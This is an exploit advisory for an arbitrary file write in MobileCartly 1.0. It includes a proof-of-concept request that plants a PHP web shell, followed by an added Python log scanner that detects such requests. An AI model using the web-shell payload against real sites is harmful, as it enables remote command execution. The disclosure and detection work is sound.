MobileCartly 1.0 – Arbitrary File Write

  • Author: Yakir Wizman
    Date: 2012-08-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/20422/
  • # -----------------------------------------------------------
    # MobileCartly 1.0 Arbitrary File Write Vulnerability
    # Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
    # Date 10/08/2012
    # Download - http://mobilecartly.com/mobilecartly.zip
    # ISRAEL
    # -----------------------------------------------------------
    #		The author will not be responsible for any damage.
    # -----------------------------------------------------------
    # I. DESCRIPTION
    # -----------------------------------------------------------
    # The application is prone to an arbitrary file write / overwrite vulnerability.
    #
    # -----------------------------------------------------------
    # II. PoC EXPLOIT
    # -----------------------------------------------------------
    # http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE
    # FILENAME for example 'shell.php'
    # CODE for example '<?php echo(shell_exec($_GET['cmd'])); ?>'
    # Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir
    # -----------------------------------------------------------
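
Added example, not part of the original advisory: a log check that flags requests to the `savepage.php` endpoint named in the PoC when the `savepage` value carries an executable extension or leaves the `pages/` directory, or when `pagecontent` contains a server-side code opener. It assumes a Combined Log Format access log; the extension list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names come from the advisory's PoC URL.
ENDPOINT = "/includes/savepage.php"
# Extensions a PHP host may execute or interpret (assumed list; tune per server).
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar|pht|cgi|pl|htaccess)$", re.I)
# Server-side code openers that should never appear in saved page content.
CODE_MARKER = re.compile(r"<\?|<%")
# Combined Log Format: client, identd, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the reasons a request target looks like abuse of savepage.php."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ENDPOINT):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once
    reasons = set()
    for name in query.get("savepage", []):
        norm = name.replace("\\", "/")
        if ".." in norm.split("/") or norm.startswith("/"):
            reasons.add("path-escape")
        if EXEC_EXT.search(norm.rstrip(". ")):  # Windows drops trailing dot/space
            reasons.add("executable-extension")
    for body in query.get("pagecontent", []):
        if CODE_MARKER.search(body):
            reasons.add("server-side-code")
    return sorted(reasons)

def scan(lines):
    """Return (client, status, reasons) for each log line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := classify(m.group(2))):
            hits.append((m.group(1), int(m.group(3)), reasons))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [10/Aug/2012:10:00:01 +0000] "GET /mobilecartly/includes/savepage.php?savepage=about.html&pagecontent=Hello HTTP/1.1" 200 12',
    '198.51.100.7 - - [10/Aug/2012:10:02:13 +0000] "GET /mobilecartly/includes/savepage.php?savepage=shell.php&pagecontent=%3C%3Fphp+echo+1%3B+%3F%3E HTTP/1.1" 200 0',
    '198.51.100.7 - - [10/Aug/2012:10:02:40 +0000] "GET /mobilecartly/includes/savepage.php?savepage=..%2F..%2Findex.html&pagecontent=x HTTP/1.1" 200 0',
    '192.0.2.10 - - [10/Aug/2012:10:03:00 +0000] "GET /mobilecartly/index.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Access logs record only the query string, so this covers the GET form shown in the PoC; a request that sends the same parameters in a POST body would need body logging or a WAF rule to be seen.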